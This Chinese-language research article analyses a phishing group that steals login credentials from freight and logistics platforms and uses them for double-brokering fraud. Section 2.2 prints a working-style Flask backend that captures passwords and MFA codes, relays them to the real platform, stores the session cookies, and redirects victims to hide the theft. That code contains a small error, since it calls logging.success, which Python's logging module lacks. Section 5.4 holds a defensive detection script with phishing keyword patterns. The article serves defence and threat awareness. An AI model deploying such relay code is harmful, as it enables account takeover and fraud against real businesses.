俄亚背景黑客组织对欧美货运业的凭证窃取与双重经纪欺诈研究

摘要

随着全球物流供应链的数字化转型加速，货运与物流公司已成为高级持续性威胁（APT）及有组织网络犯罪团伙的高价值目标。本文以近期被披露的俄亚背景黑客组织“Diesel Vortex”为研究对象，深入剖析其针对美欧货运企业发起的系列网络攻击活动。该组织通过高度定制化的网络钓鱼手段，成功窃取了超过1600个关键物流平台（包括货运看板、车队管理系统及燃料卡门户）的登录凭证，并以此实施了大规模的“双重经纪”欺诈及货物拦截行动。研究基于对该组织意外暴露的.git目录及其内部通信记录的取证分析，揭示了其严密的企业化组织架构，包括专门的呼叫中心、邮件支持团队及外联协调人员。此外，本文重点探讨了该组织正在开发的“MC Profit Always”钓鱼即服务（PhaaS）平台，标志着其犯罪能力正从单一行动向产品化、生态化演进。文章通过重构攻击链条，量化分析了凭证窃取到资金变现的全过程，并从技术防御、身份认证机制及行业协同治理三个维度提出了针对性的应对策略。本研究旨在填补当前关于物流行业针对性网络犯罪战术、技术与过程（TTPs）的研究空白，为构建更具韧性的全球供应链安全体系提供理论依据与实践参考。

1 引言

全球货运与物流行业是维持世界经济运转的动脉，其日均处理的货物价值数以亿计。然而，该行业的数字化进程在提升效率的同时，也引入了显著的安全脆弱性。传统的物流安全关注点主要集中在物理层面的货物防盗与运输路线优化，而对于支撑现代物流运作的数字基础设施——如运输管理系统（TMS）、货运匹配平台及电子日志设备（ELD）——的网络安全防护往往滞后。这种“重物理、轻数字”的安全范式，使得物流行业成为了网络犯罪分子眼中的“低垂果实”。

2025年末至2026年初，一个代号为“Diesel Vortex”的网络犯罪团伙浮出水面，其活动轨迹横跨俄罗斯与亚美尼亚，主要攻击目标锁定在美国和欧洲的货运经纪公司、承运商及物流服务商。与传统 opportunistic（机会主义）的黑客不同，Diesel Vortex 展现出了极高的专业度与组织化特征。该组织不仅成功渗透了超过1600个物流平台的账户，更利用这些凭证构建了复杂的欺诈闭环，实施“双重经纪”（Double Brokering）诈骗，即冒充合法承运商承接货物，随后将订单转包给不知情的第三方或直接卷货跑路，导致受害者面临巨额经济损失与货物丢失风险。据行业估算，此类货运盗窃与欺诈每年造成的全球损失高达350亿美元，而Diesel Vortex的活动仅是冰山一角。

该案件的突破性进展源于一次意外的技术失误：攻击者在部署其钓鱼基础设施时，未正确配置版本控制系统，导致包含源代码、内部文档及操作手册的.git目录公开暴露。这一事件为安全研究人员提供了罕见的“上帝视角”，得以深入窥探该犯罪团伙的内部运作机制、分工体系及未来规划。研究发现，Diesel Vortex 已不再是一个松散的犯罪小组，而是具备了类似正规企业的科层制结构，甚至正在开发名为“MC Profit Always”的钓鱼即服务（PhaaS）平台，试图将其成熟的攻击工具链向其他犯罪团伙出售。

本文旨在基于现有的威胁情报与取证数据，对Diesel Vortex的攻击模式进行系统性解构。首先，文章将复盘其网络钓鱼攻击的技术细节与社会工程学策略；其次，深入分析其利用被盗凭证实施双重经纪欺诈的业务逻辑与资金流向；再次，剖析其企业化的组织架构及PhaaS平台的潜在威胁；最后，结合物流行业的特殊性，提出一套涵盖技术加固、流程再造与情报共享的综合防御框架。本研究不局限于个案分析，而是试图透过Diesel Vortex这一典型样本，揭示物流行业在网络空间面临的系统性风险，并为相关政策制定者与企业安全官提供决策支持。

2 攻击向量分析：定制化钓鱼与凭证窃取机制

Diesel Vortex 的成功并非依赖于零日漏洞（0-day）的利用，而是建立在对物流行业业务流程的深刻理解与高度定制化的社会工程学攻击之上。其攻击链条的起点是精准的网络钓鱼，旨在获取目标系统的合法登录凭证。

2.1 目标侦察与鱼叉式钓鱼构建

在发动攻击前，该组织会对目标货运公司进行详尽的开源情报（OSINT）收集。研究人员发现，攻击者重点关注那些在公共货运看板（Load Boards）上活跃的小型至中型货运经纪公司。这些企业通常IT安全预算有限，且员工流动性大，是理想的突破口。

攻击者伪造的钓鱼邮件极具迷惑性，其内容紧密贴合物流场景。常见的诱导主题包括：“紧急货物预订请求”、“运费发票更新”、“驾驶员资格文件过期通知”或“燃油卡账户验证”。邮件正文通常模仿知名物流平台（如DAT Solutions、Truckstop.com、Uber Freight等）的官方语气，并附带看似合法的链接或附件。

与通用钓鱼不同，Diesel Vortex 的钓鱼页面采用了动态适配技术。当用户点击链接后， landing page（落地页）会根据用户的User-Agent及IP地址，自动渲染成目标用户常用的特定物流平台登录界面。这种“千人千面”的伪装极大地降低了受害者的警惕性。

2.2 凭证实时中继与会话劫持

一旦受害者在伪造页面上输入用户名和密码，攻击者并非简单地存储这些数据，而是采用“实时中继”（Real-time Relay）技术。后端脚本立即利用窃取的凭证尝试登录真实的物流平台。如果目标平台启用了多因素认证（MFA），钓鱼页面会同步弹出伪造的MFA输入框，诱导用户输入一次性验证码。攻击者利用该验证码在毫秒级时间内完成真实平台的登录，并窃取会话Cookie（Session Cookie）。

这种技术使得攻击者能够绕过MFA保护，直接获得有效的登录会话。即便受害者随后修改了密码，攻击者持有的有效Session Cookie仍允许其在一定时间窗口内持续访问系统。

以下代码片段模拟了Diesel Vortex可能使用的钓鱼后端逻辑，展示了如何实时中继凭证并处理MFA令牌：

import requests

from flask import Flask, request, redirect, render_template_string

import logging

app = Flask(__name__)

# 配置真实目标平台的基础URL (示例)

TARGET_PLATFORM_URL = "https://api.real-logistics-platform.com/auth/login"

SESSION_STORE = {}

# 模拟钓鱼登录处理路由

@app.route('/login', methods=['POST'])

def handle_login():

   username = request.form.get('username')

   password = request.form.get('password')

   mfa_token = request.form.get('mfa_token') # 如果存在

 

   logging.info(f"Captured Credentials: User={username}, Pass={password}")

 

   # 第一步：尝试使用窃取的凭证登录真实平台

   try:

       payload = {

           'username': username,

           'password': password

       }

       if mfa_token:

           payload['mfa_code'] = mfa_token

         

       response = requests.post(TARGET_PLATFORM_URL, json=payload, timeout=5)

     

       if response.status_code == 200:

           # 登录成功，提取会话Cookie或Token

           auth_token = response.cookies.get('session_id') or response.json().get('access_token')

         

           # 将会话信息存储到攻击者数据库，供后续欺诈使用

           SESSION_STORE[username] = {

               'token': auth_token,

               'cookies': dict(response.cookies),

               'status': 'active'

           }

         

           logging.success(f"Successful breach for user: {username}")

         

           # 可选：将用户重定向到真实网站以掩盖痕迹

           return redirect("https://www.real-logistics-platform.com/dashboard")

       else:

           # 登录失败，返回错误信息给用户，诱导重试

           return render_template_string("<h1>登录失败，请检查您的凭证或联系支持部门。</h1>")

         

   except Exception as e:

       logging.error(f"Relay error: {str(e)}")

       return render_template_string("<h1>系统维护中，请稍后重试。</h1>")

if __name__ == '__main__':

   # 在生产环境中，攻击者会隐藏日志并使用HTTPS

   app.run(host='0.0.0.0', port=443, ssl_context='adhoc')

上述代码逻辑揭示了攻击的核心：钓鱼网站不仅是数据收集器，更是通往真实系统的代理网关。通过这种方式，Diesel Vortex 能够批量获取高权限账户，为后续的欺诈活动奠定基础。

2.3 规模化凭证库的建立

在短短五个月内，该组织积累了超过1600个有效凭证。这些凭证覆盖了不同类型的物流系统：

货运看板账户：用于发布虚假货源或搜索真实货源。

车队管理门户：用于监控车辆位置、篡改电子日志。

燃料卡系统：用于盗刷燃油或进行洗钱。

经纪商后台：用于查看未付运费发票及银行转账信息。

这种多样化的凭证组合，使得攻击者能够灵活选择最有利的攻击路径，无论是直接盗窃货物，还是通过复杂的金融欺诈获利。

3 双重经纪欺诈与货物拦截的业务逻辑

获取凭证只是手段，变现才是目的。Diesel Vortex 利用被盗账户实施的“双重经纪”欺诈，是物流行业特有的犯罪形态，其复杂程度远超普通的网络诈骗。

3.1 双重经纪欺诈的操作流程

双重经纪（Double Brokering）本身在物流行业中属于违规行为，指承运商在未告知货主的情况下，将货物转包给另一家承运商。而Diesel Vortex 将这一行为演变为纯粹的犯罪工具：

身份伪装：攻击者登录被盗的合法承运商账户（Account A）。由于该账户拥有良好的历史信誉评分，因此在货运看板上极易获得信任。

承接货物：攻击者利用Account A在货运看板上“抢单”，承接货主或正规经纪公司发布的运输任务。此时，货主认为承运方是信誉良好的Company A。

虚假转包：攻击者随即使用另一个由其完全控制的空壳承运商账户（Account B），或者在暗网/黑市上寻找不知情的真实卡车司机，将同一批货物以较低的价格转包出去。

单据伪造：为了骗取运费，攻击者利用Account A的权限，在系统中上传伪造的提货单（BOL）和交付证明（POD）。这些文件通常经过PS处理，签名和印章逼真，足以通过自动化审核。

资金截留：一旦货物显示“送达”（实际上可能还在途中或已被转移），货主或经纪公司会将运费支付到Account A绑定的银行账户。攻击者迅速将资金转出并清洗，随后消失。

后果承担：真正的货主发现货物未按预期到达，而名义上的承运商Company A对此毫不知情（其账户被盗用）。实际运输货物的司机（如果是被欺骗的第三方）因未收到运费而扣留货物，导致货物丢失或延误。

3.2 货物拦截与物理盗窃

除了金融欺诈，Diesel Vortex 还实施了直接的货物拦截。通过入侵车队管理系统或电子日志设备（ELD）的配套应用，攻击者能够实时获取高价值货物（如电子产品、医疗器械、奢侈品）的精确位置和预计到达时间。

在某些案例中，攻击者利用被盗的承运商身份联系司机，谎称需要更改卸货地点或进行“紧急安全检查”，诱导司机将货物运送至指定的仓库。一旦货物入库，即被迅速转移并销赃。由于攻击者使用的是合法账户发出的指令，司机往往难以察觉异常，直到为时已晚。

3.3 燃料卡滥用与洗钱

窃取的燃料卡凭证被用于另一种形式的套利。攻击者利用被盗账户在加油站大量购买燃油，然后将燃油转售给黑市，或者直接利用燃料卡支付其他非法服务的费用。此外，他们还可能通过虚构运输里程和燃油消耗，向保险公司或税务部门申请 fraudulent claims（欺诈性索赔）。

这种多元化的变现手段，使得Diesel Vortex 能够在短时间内实现收益最大化，同时也增加了执法部门追踪资金流向的难度。

4 组织架构揭秘：企业化运营与PhaaS转型

对Diesel Vortex 暴露的.git目录及内部服务器的取证分析，揭示了该组织令人震惊的成熟度。这不仅仅是一个黑客团伙，更像是一家运营规范的“犯罪企业”。

4.1 严密的科层制结构

源代码注释、内部聊天记录及任务分配文档显示，Diesel Vortex 内部有着明确的分工：

开发团队：负责维护钓鱼网站、编写自动化脚本及开发PhaaS平台。他们精通Web开发、反检测技术及区块链洗钱手段。

运营团队（呼叫中心）：设有专门的“客服”人员，负责接听来自可疑目标的电话，或主动联系被骗司机。他们的话术经过精心打磨，能够流利地使用英语及东欧语言，模仿正规物流调度员的口吻，以消除对方疑虑。

外联组：负责在货运看板上发布虚假信息，并与潜在的“下家”承运商沟通，处理转包事宜。

财务组：专门负责资金清洗，利用加密货币混币器、离岸账户及地下钱庄将非法所得合法化。

这种分工使得组织具备极强的抗打击能力。即使部分环节被破坏，其他部门仍能独立运转。

4.2 “MC Profit Always”：钓鱼即服务（PhaaS）的崛起

最危险的信号来自于该组织正在开发的名为“MC Profit Always”的平台。这是一个典型的钓鱼即服务（Phishing-as-a-Service, PhaaS）项目，旨在将Diesel Vortex 的攻击能力产品化，提供给其他犯罪团伙使用。

平台功能特性：

模块化模板库：内置数十种针对主流物流平台（DAT, Truckstop, Mercury, etc.）的高保真钓鱼模板，用户可一键部署。

自动化凭证管理：提供可视化的仪表盘，实时显示窃取的凭证、会话状态及MFA绕过情况。

分润系统：支持自动化的收益分配，平台开发者从下游使用者的欺诈所得中抽取佣金（通常为20%-30%）。

技术支持：提供7x24小时的“客服支持”，帮助买家解决部署问题或定制特定的钓鱼场景。

PhaaS模式的出現，意味着网络攻击的门槛将进一步降低。原本不具备高技术能力的普通罪犯，只需支付少量费用，即可发动针对物流行业的高级攻击。这将导致针对货运公司的钓鱼攻击数量呈指数级增长，形成“病毒式”扩散效应。

4.3 意外暴露与安全启示

Diesel Vortex 的落网部分归因于其开发人员在GitHub或其他代码托管平台上误将包含敏感信息的.git目录设为公开。这一目录中包含了数据库连接字符串、API密钥、内部Wiki文档以及未加密的员工（犯罪成员）名单。

这一事件具有双重意义：一方面，它证明了即使是犯罪组织也会犯下低级配置错误，为执法机构提供了宝贵的线索；另一方面，它也警示所有企业，版本控制系统的配置管理至关重要。任何疏忽都可能导致核心资产泄露，无论是对防御者还是攻击者而言，皆是如此。

5 防御架构与行业协同治理策略

面对Diesel Vortex 这类高度组织化、技术精湛且深谙业务逻辑的对手，传统的边界防御已显捉襟见肘。物流行业必须构建一套纵深防御体系，并结合行业特性实施协同治理。

5.1 强化身份认证与访问控制

凭证窃取是此类攻击的根源，因此强化身份验证是首要任务。

强制实施FIDO2/WebAuthn：传统的短信或TOTP验证码易受钓鱼攻击（如中间人攻击）。物流平台应全面推广基于硬件密钥（如YubiKey）或生物识别的FIDO2标准。这种无密码认证方式从根本上杜绝了凭证被钓鱼窃取的可能性，因为私钥永不离开用户设备。

基于行为的自适应认证：引入用户实体行为分析（UEBA）技术。系统应实时监控登录行为，如登录地点、设备指纹、操作习惯等。若检测到异常（如某账户突然从异国IP登录并试图修改收款银行信息），应立即阻断并要求二次强验证。

最小权限原则：严格限制账户权限。对于货运经纪人、司机及供应商，仅授予其完成任务所需的最小权限，避免单一账户泄露导致整个系统沦陷。

5.2 业务流程的数字化重塑

针对双重经纪欺诈，需要从业务流程上堵塞漏洞。

承运商身份多方核验：建立跨平台的承运商身份验证机制。在承接货物前，强制通过第三方权威数据库（如FMCSA数据库）核验承运商的MC号码、保险状态及所有权信息，并比对账户注册信息与官方记录的一致性。

智能合约与区块链应用：探索利用区块链技术记录运输全过程。将货运订单、提货单、交付证明及支付信息上链，确保数据不可篡改且全程可追溯。智能合约可设定只有在货物经多方确认送达后，资金才自动释放，从而消除伪造单据骗款的空间。

Out-of-Band（带外）验证：对于关键的变更操作（如修改收款账户、更改卸货地址），必须通过独立的通信渠道（如电话录音、视频确认）进行人工复核，严禁仅在系统内通过消息确认。

5.3 威胁情报共享与行业联盟

单个企业的防御能力是有限的，必须依靠行业集体的力量。

建立物流行业ISAC：成立专门的信息共享与分析中心（ISAC），促进货运公司、技术供应商、执法机构之间的威胁情报实时共享。一旦发现新的钓鱼域名、恶意IP或欺诈手法，立即通报全行业。

联合黑名单机制：共建共享欺诈承运商、可疑银行账户及恶意域名的黑名单库。各货运平台在接入新承运商或处理支付时，自动比对黑名单，拦截高风险交易。

红蓝对抗演练：定期组织行业范围内的网络攻防演练，模拟Diesel Vortex 等高级对手的攻击手法，检验各企业的应急响应能力与防御体系的有效性。

5.4 技术检测代码示例

为了辅助检测潜在的钓鱼活动，以下提供一个基于自然语言处理（NLP）的邮件检测逻辑示例，用于识别针对物流人员的鱼叉式钓鱼邮件：

import re

from textblob import TextBlob

# 定义物流行业特有的高危关键词与语境模式

LOGISTICS_PHISHING_PATTERNS = [

   r"urgent\s+(load|shipment|booking)",

   r"verify\s+(your\s+)?(account|credentials|mc\ number)",

   r"update\s+(payment|banking|routing)\s+details",

   r"driver\s+(qualification|license)\s+expired",

   r"click\s+here\s+to\s+(view|accept)\s+load"

]

# 常见物流平台名称（用于检测仿冒）

LEGIT_PLATFORMS = ["dat solutions", "truckstop", "uber freight", "convoy", "mercury gate"]

def analyze_email_risk(subject, body, sender_domain):

   risk_score = 0

   indicators = []

 

   # 1. 检查发件人域名是否为公共邮箱或仿冒域名

   public_domains = ["gmail.com", "yahoo.com", "hotmail.com", "protonmail.com"]

   if any(sender_domain.endswith(d) for d in public_domains):

       # 物流商务沟通通常使用企业域名，公共域名风险较高

       risk_score += 20

       indicators.append("Sender uses public email domain")

     

   # 2. 检查正文是否包含高危模式

   content = (subject + " " + body).lower()

   for pattern in LOGISTICS_PHISHING_PATTERNS:

       if re.search(pattern, content):

           risk_score += 15

           indicators.append(f"Matched suspicious pattern: {pattern}")

         

   # 3. 检查是否包含紧急催促语气 (情感分析)

   blob = TextBlob(body)

   if blob.polarity < -0.3: # 负面情绪或极度紧迫

       risk_score += 10

       indicators.append("High urgency/negative sentiment detected")

     

   # 4. 检查链接中的域名是否与声称的平台不符

   urls = re.findall(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', body)

   for url in urls:

       for platform in LEGIT_PLATFORMS:

           if platform in content and platform not in url:

               risk_score += 30

               indicators.append(f"Link domain does not match claimed platform ({platform})")

               break

             

   return {

       "risk_score": min(risk_score, 100),

       "level": "Critical" if risk_score > 60 else "High" if risk_score > 40 else "Medium",

       "indicators": indicators

   }

# 模拟测试

sample_email = {

   "subject": "URGENT: Verify your MC Account to accept Load #4921",

   "body": "Dear Carrier, Your account credentials have expired. Please click here http://dat-solutions-verify.net/login to update your banking details immediately or lose access.",

   "sender_domain": "support@gmail.com"

}

result = analyze_email_risk(sample_email['subject'], sample_email['body'], sample_email['sender_domain'])

print(f"Risk Assessment: {result['level']} (Score: {result['risk_score']})")

print("Indicators:")

for ind in result['indicators']:

   print(f"- {ind}")

该代码展示了如何通过多维度的特征工程来识别潜在的物流钓鱼邮件，为企业部署邮件安全网关提供逻辑参考。

6 结语

Diesel Vortex 组织的曝光，不仅揭露了一起跨国网络犯罪案件，更深刻地反映了全球物流行业在数字化转型深水区所面临的安全困境。该组织展现出的企业化运作模式、对业务逻辑的精准把控以及向PhaaS转型的趋势，标志着针对关键基础设施的网络攻击已进入一个新的阶段。攻击者不再仅仅是技术的滥用者，更是业务流程的操纵者。

通过对Diesel Vortex 攻击链条的复盘，我们清晰地看到，从凭证窃取到双重经纪欺诈，每一个环节都利用了行业现有流程中的信任机制与技术短板。单纯的防火墙或杀毒软件已无法阻挡此类精心策划的攻击。未来的防御必须是全方位的：技术上，需全面拥抱无密码认证与行为分析；流程上，需重构信任验证机制，引入区块链等不可篡改技术；生态上，需打破信息孤岛，建立全行业的威胁情报共享与联防联控机制。

物流行业的网络安全不仅仅是IT部门的责任，更是关乎全球供应链稳定与经济安全的战略议题。面对日益狡猾与专业的犯罪团伙，唯有保持持续的警惕、不断迭代防御策略，并加强国际合作，方能有效遏制此类犯罪的蔓延，守护好这条维系全球经济命脉的数字通道。Diesel Vortex 的被摧毁是一个胜利，但更是一场持久战的开始。

编辑：芦笛（公共互联网反网络钓鱼工作组）